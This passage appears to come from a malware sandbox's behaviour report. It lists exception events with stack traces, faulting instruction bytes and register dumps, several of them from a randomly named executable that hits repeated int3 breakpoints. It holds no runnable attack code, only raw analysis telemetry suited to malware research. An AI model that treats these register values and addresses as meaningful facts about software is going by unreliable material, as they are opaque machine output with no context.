0x6fc21838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6fc21737 mscorlib+0x2d36ad @ 0x6eeb36ad mscorlib+0x308f2d @ 0x6eee8f2d microsoft+0x50c17 @ 0x72050c17 microsoft+0x3f33f @ 0x7203f33f microsoft+0x3edf8 @ 0x7203edf8 microsoft+0x3e3b9 @ 0x7203e3b9 0x420234 0x4200b2 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6fbb2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6fc674ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6fc67610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x6fcf1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x6fcf1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x6fcf1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x6fcf416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7443f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x744b7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x744b4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 39 09 e8 32 2f a3 6e c7 45 e8 00 00 00 00 c7 45 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4281ab registers.esp: 4119060 registers.edi: 4119080 registers.eax: 0 registers.ebp: 4119092 registers.edx: 49687160 registers.ebx: 4119392 registers.esi: 49687160 registers.ecx: 0	1
__exception__ June 21, 2021, 12:57 p.m.	stacktrace: 0x42d884 0x42cdb7 0x4283df DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6fc21838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6fc21737 mscorlib+0x2d3711 @ 0x6eeb3711 mscorlib+0x308f2d @ 0x6eee8f2d mscorlib+0x2cb060 @ 0x6eeab060 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6fc21838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6fc21737 mscorlib+0x2d36ad @ 0x6eeb36ad mscorlib+0x308f2d @ 0x6eee8f2d microsoft+0x50c17 @ 0x72050c17 microsoft+0x3f33f @ 0x7203f33f microsoft+0x3edf8 @ 0x7203edf8 microsoft+0x3e3b9 @ 0x7203e3b9 0x420234 0x4200b2 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6fbb2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6fc674ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6fc67610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x6fcf1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x6fcf1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x6fcf1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x6fcf416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7443f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x744b7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x744b4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 0f bf 01 eb 31 8d 55 e0 0f b6 01 88 02 0f b6 41 exception.instruction: movsx eax, word ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: mscorlib+0x305ad2 exception.address: 0x6eee5ad2 registers.esp: 4121364 registers.edi: 4121388 registers.eax: 0 registers.ebp: 4121400 registers.edx: 0 registers.ebx: 50044472 registers.esi: 9896034 registers.ecx: 9896034	1
__exception__ June 21, 2021, 12:57 p.m.	stacktrace: fdb1n217b2a716347aypy7b42e8m8jdfm23+0x5f0f @ 0x405f0f fdb1n217b2a716347aypy7b42e8m8jdfm23+0x645b @ 0x40645b BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: cc 50 33 c0 0f 9b c0 52 33 d0 c1 e2 02 92 5a 0b exception.symbol: fdb1n217b2a716347aypy7b42e8m8jdfm23+0x38b0 exception.instruction: int3 exception.module: fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe exception.exception_code: 0x80000003 exception.offset: 14512 exception.address: 0x4038b0 registers.esp: 2424228 registers.edi: 8071104 registers.eax: 46686406 registers.ebp: 2424244 registers.edx: 4294826996 registers.ebx: 0 registers.esi: 8028840 registers.ecx: 0	1
__exception__ June 21, 2021, 12:57 p.m.	stacktrace: fdb1n217b2a716347aypy7b42e8m8jdfm23+0x5f0f @ 0x405f0f fdb1n217b2a716347aypy7b42e8m8jdfm23+0x645b @ 0x40645b BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: cc 50 33 c0 b8 0c 00 00 00 58 b9 e8 03 00 00 e8 exception.symbol: fdb1n217b2a716347aypy7b42e8m8jdfm23+0x38c2 exception.instruction: int3 exception.module: fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe exception.exception_code: 0x80000003 exception.offset: 14530 exception.address: 0x4038c2 registers.esp: 2424228 registers.edi: 8071104 registers.eax: 46686406 registers.ebp: 2424244 registers.edx: 4294826996 registers.ebx: 0 registers.esi: 8028840 registers.ecx: 0	1
__exception__ June 21, 2021, 12:57 p.m.	stacktrace: fdb1n217b2a716347aypy7b42e8m8jdfm23+0x5f0f @ 0x405f0f fdb1n217b2a716347aypy7b42e8m8jdfm23+0x645b @ 0x40645b BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: cc 50 33 c0 0f 9b c0 52 33 d0 c1 e2 02 92 5a 0b exception.symbol: fdb1n217b2a716347aypy7b42e8m8jdfm23+0x38d6 exception.instruction: int3 exception.module: fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe exception.exception_code: 0x80000003 exception.offset: 14550 exception.address: 0x4038d6 registers.esp: 2424228 registers.edi: 8071104 registers.eax: 0 registers.ebp: 2424244 registers.edx: 4294826996 registers.ebx: 0 registers.esi: 8028840 registers.ecx: 1990732924	1
__exception__ June 21, 2021, 12:57 p.m.	stacktrace: fdb1n217b2a716347aypy7b42e8m8jdfm23+0x5f0f @ 0x405f0f fdb1n217b2a716347aypy7b42e8m8jdfm23+0x645b @ 0x40645b BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: cc e8 f6 51 00 00 8b d8 50 52 81 f2 90 00 00 00 exception.symbol: fdb1n217b2a716347aypy7b42e8m8jdfm23+0x38e8 exception.instruction: int3 exception.module: fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe exception.exception_code: 0x80000003 exception.offset: 14568 exception.address: 0x4038e8 registers.esp: 2424228 registers.edi: 8071104 registers.eax: 0 registers.ebp: 2424244 registers.edx: 4294826996 registers.ebx: 0 registers.esi: 8028840 registers.ecx: 1990732924	1
__exception__ June 21, 2021, 12:57 p.m.	stacktrace: 0xf5f0f BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: cc 50 33 c0 0f 9b c0 52 33 d0 c1 e2 02 92 5a 0b exception.instruction: int3 exception.exception_code: 0x80000003 exception.symbol: exception.address: 0xf38b0 registers.esp: 1439692 registers.edi: 4555488 registers.eax: 46686531 registers.ebp: 1439708 registers.edx: 2130566132 registers.ebx: 2130567168 registers.esi: 4562440 registers.ecx: 0	1
__exception__ June 21, 2021, 12:57 p.m.	stacktrace: 0xf5f0f BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: cc 50 33 c0 b8 0c 00 00 00 58 b9 e8 03 00 00 e8 exception.instruction: int3 exception.exception_code: 0x80000003 exception.symbol: exception.address: 0xf38c2 registers.esp: 1439692 registers.edi: 4555488 registers.eax: 46686531 registers.ebp: 1439708 registers.edx: 2130566132 registers.ebx: 2130567168 registers.esi: 4562440 registers.ecx: 0	1
__exception__ June 21, 2021, 12:57 p.m.	stacktrace: 0xf5f0f BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: cc 50 33 c0 0f 9b c0 52 33 d0 c1 e2 02 92 5a 0b exception.instruction: int3 exception.exception_code: 0x80000003 exception.symbol: exception.address: 0xf38d6 registers.esp: 1439692 registers.edi: 4555488 registers.eax: 0 registers.ebp: 1439708 registers.edx: 2130566132 registers.ebx: 2130567168 registers.esi: 4562440 registers.ecx: 1990732924	1
__exception__ June 21, 2021, 12:57 p.m.	stacktrace: 0xf5f0f BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: cc e8 f6 51 00 00 8b d8 50 52 81 f2 90 00 00 00 exception.instruction: int3 exception.exception_code: 0x80000003 exception.symbol: exception.address: 0xf38e8 registers.esp: 1439692 registers.edi: 4555488 registers.eax: 0 registers.ebp: 1439708 registers.edx: 2130566132 registers.ebx: 2130567168 registers.esi: 4562440 registers.ecx: 1990732924	1
__exception__ June 21, 2021, 12:57 p.m.	stacktrace: CopyPDBs+0x1b552 DllCanUnloadNowInternal-0x25a85 clr+0x1b1194 @ 0x6fd51194 LogHelp_TerminateOnAssert+0x14061 GetPrivateContextsPerfCounters-0x53e1 clr+0x82ba1 @ 0x6fc22ba1 mscorlib+0x2f45b0 @ 0x6eed45b0 mscorlib+0x2f73b5 @ 0x6eed73b5 mscorlib+0x2eeaf8 @ 0x6eeceaf8 mscorlib+0x2eea8f @ 0x6eecea8f 0x3a04a6 0x3a00f4 0x3a00b2 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6fbb2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6fc674ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6fc67610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x6fcf1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x6fcf1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x6fcf1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x6fcf416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7443f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x744b7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x744b4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xe0434f4e exception.offset: 46887 exception.address: 0x76a7b727 registers.esp: 5435444 registers.edi: 0 registers.eax: 5435444 registers.ebp: 5435524 registers.edx: 0 registers.ebx: 10299376 registers.esi: 9529952 registers.ecx: 2629677375	1
__exception__ June 21, 2021, 12:57 p.m.	stacktrace: CopyPDBs+0x1b552 DllCanUnloadNowInternal-0x25a85 clr+0x1b1194 @ 0x6fd51194 LogHelp_TerminateOnAssert+0x14061 GetPrivateContextsPerfCounters-0x53e1 clr+0x82ba1 @ 0x6fc22ba1 mscorlib+0x2f45b0 @ 0x6eed45b0 mscorlib+0x2f73b5 @ 0x6eed73b5 mscorlib+0x2eeaf8 @ 0x6eeceaf8 mscorlib+0x2eea8f @ 0x6eecea8f 0x6904a6 0x6900f4 0x6900b2 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6fbb2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6fc674ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6fc67610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x6fcf1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x6fcf1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x6fcf1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x6fcf416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7443f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x744b7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x744b4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xe0434f4e exception.offset: 46887 exception.address: 0x76a7b727 registers.esp: 3928020 registers.edi: 0 registers.eax: 3928020 registers.ebp: 3928100 registers.edx: 0 registers.ebx: 5529072 registers.esi: 4806464 registers.ecx: 2639407055	1
__exception__ June 21, 2021, 12:57 p.m.	stacktrace: 0x69813e 0x697639 0x6971c9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f CoUninitializeEE+0xa5b4 CreateAssemblyNameObject-0x36a1 clr+0x29df8 @ 0x6fbc9df8 CoUninitializeEE+0xa5eb CreateAssemblyNameObject-0x366a clr+0x29e2f @ 0x6fbc9e2f CoUninitializeEE+0xa6b9 CreateAssemblyNameObject-0x359c clr+0x29efd @ 0x6fbc9efd CoUninitializeEE+0xa75e CreateAssemblyNameObject-0x34f7 clr+0x29fa2 @ 0x6fbc9fa2 LogHelp_TerminateOnAssert+0x16b0b GetPrivateContextsPerfCounters-0x2937 clr+0x8564b @ 0x6fc2564b CreateAssemblyNameObject+0x2e9ca GetMetaDataInternalInterface-0x9aa5 clr+0x5be63 @ 0x6fbfbe63 CreateAssemblyNameObject+0x2e4ff GetMetaDataInternalInterface-0x9f70 clr+0x5b998 @ 0x6fbfb998 CreateAssemblyNameObject+0x2e28d GetMetaDataInternalInterface-0xa1e2 clr+0x5b726 @ 0x6fbfb726 CreateAssemblyNameObject+0x2eacf GetMetaDataInternalInterface-0x99a0 clr+0x5bf68 @ 0x6fbfbf68 CreateAssemblyNameObject+0x2e84b GetMetaDataInternalInterface-0x9c24 clr+0x5bce4 @ 0x6fbfbce4 DllRegisterServerInternal+0xa898 CoUninitializeEE-0x2ba0 clr+0x1cca4 @ 0x6fbbcca4 DllRegisterServerInternal+0xa92b CoUninitializeEE-0x2b0d clr+0x1cd37 @ 0x6fbbcd37 DllGetClassObjectInternal+0x437c8 CorDllMainForThunk-0x48d33 clr+0x108841 @ 0x6fca8841 LogHelp_TerminateOnAssert+0x129a9 GetPrivateContextsPerfCounters-0x6a99 clr+0x814e9 @ 0x6fc214e9 mscorlib+0x2d3711 @ 0x6eeb3711 mscorlib+0x308f2d @ 0x6eee8f2d mscorlib+0x2cb060 @ 0x6eeab060 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6fc21838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6fc21737 mscorlib+0x2d36ad @ 0x6eeb36ad mscorlib+0x308f2d @ 0x6eee8f2d microsoft+0x50c17 @ 0x72050c17 microsoft+0x3f33f @ 0x7203f33f microsoft+0x3edf8 @ 0x7203edf8 microsoft+0x3e3b9 @ 0x7203e3b9 0x690234 0x6900b2 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6fbb2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6fc674ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6fc67610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x6fcf1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x6fcf1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x6fcf1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x6fcf416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7443f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x744b7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x744b4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 39 09 e8 32 2f 7c 6e c7 45 e8 00 00 00 00 c7 45 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x6981ab registers.esp: 3923492 registers.edi: 3923512 registers.eax: 0 registers.ebp: 3923524 registers.edx: 40899112 registers.ebx: 3923824 registers.esi: 40899112 registers.ecx: 0	1
__exception__ June 21, 2021, 12:57 p.m.	stacktrace: 0x698150 0x697639 0x6971c9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f CoUninitializeEE+0xa5b4 CreateAssemblyNameObject-0x36a1 clr+0x29df8 @ 0x6fbc9df8 CoUninitializeEE+0xa5eb CreateAssemblyNameObject-0x366a clr+0x29e2f @ 0x6fbc9e2f CoUninitializeEE+0xa6b9 CreateAssemblyNameObject-0x359c clr+0x29efd @ 0x6fbc9efd CoUninitializeEE+0xa75e CreateAssemblyNameObject-0x34f7 clr+0x29fa2 @ 0x6fbc9fa2 LogHelp_TerminateOnAssert+0x16b0b GetPrivateContextsPerfCounters-0x2937 clr+0x8564b @ 0x6fc2564b CreateAssemblyNameObject+0x2e9ca GetMetaDataInternalInterface-0x9aa5 clr+0x5be63 @ 0x6fbfbe63 CreateAssemblyNameObject+0x2e4ff GetMetaDataInternalInterface-0x9f70 clr+0x5b998 @ 0x6fbfb998 CreateAssemblyNameObject+0x2e28d GetMetaDataInternalInterface-0xa1e2 clr+0x5b726 @ 0x6fbfb726 CreateAssemblyNameObject+0x2eacf GetMetaDataInternalInterface-0x99a0 clr+0x5bf68 @ 0x6fbfbf68 CreateAssemblyNameObject+0x2e84b GetMetaDataInternalInterface-0x9c24 clr+0x5bce4 @ 0x6fbfbce4 DllRegisterServerInternal+0xa898 CoUninitializeEE-0x2ba0 clr+0x1cca4 @ 0x6fbbcca4 DllRegisterServerInternal+0xa92b CoUninitializeEE-0x2b0d clr+0x1cd37 @ 0x6fbbcd37 DllGetClassObjectInternal+0x437c8 CorDllMainForThunk-0x48d33 clr+0x108841 @ 0x6fca8841 LogHelp_TerminateOnAssert+0x129a9 GetPrivateContextsPerfCounters-0x6a99 clr+0x814e9 @ 0x6fc214e9 mscorlib+0x2d3711 @ 0x6eeb3711 mscorlib+0x308f2d @ 0x6eee8f2d mscorlib+0x2cb060 @ 0x6eeab060 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6fc21838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6fc21737 mscorlib+0x2d36ad @ 0x6eeb36ad mscorlib+0x308f2d @ 0x6eee8f2d microsoft+0x50c17 @ 0x72050c17 microsoft+0x3f33f @ 0x7203f33f microsoft+0x3edf8 @ 0x7203edf8 microsoft+0x3e3b9 @ 0x7203e3b9 0x690234 0x6900b2 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6fbb2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6fc674ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6fc67610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x6fcf1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x6fcf1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x6fcf1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x6fcf416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7443f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x744b7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x744b4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 39 09 e8 32 2f 7c 6e c7 45 e8 00 00 00 00 c7 45 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x6981ab registers.esp: 3923492 registers.edi: 3923512 registers.eax: 0 registers.ebp: 3923524 registers.edx: 52337300 registers.ebx: 3923824 registers.esi: 52337300 registers.ecx: 0	1
__exception__ June 21, 2021, 12:58 p.m.	stacktrace: CopyPDBs+0x1b552 DllCanUnloadNowInternal-0x25a85 clr+0x1b1194 @ 0x6fd51194 LogHelp_TerminateOnAssert+0x14061 GetPrivateContextsPerfCounters-0x53e1 clr+0x82ba1 @ 0x6fc22ba1 mscorlib+0x2f45b0 @ 0x6eed45b0 mscorlib+0x2f73b5 @ 0x6eed73b5 mscorlib+0x2eeaf8 @ 0x6eeceaf8 mscorlib+0x2eea8f @ 0x6eecea8f 0x6704a6 0x6700f4 0x6700b2 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6fbb2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6fc674ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6fc67610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x6fcf1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x6fcf1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x6fcf1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x6fcf416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7443f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x744b7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x744b4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xe0434f4e exception.offset: 46887 exception.address: 0x76a7b727 registers.esp: 2093348 registers.edi: 0 registers.eax: 2093348 registers.ebp: 2093428 registers.edx: 0 registers.ebx: 4489544 registers.esi: 3770448 registers.ecx: 2505992469	1
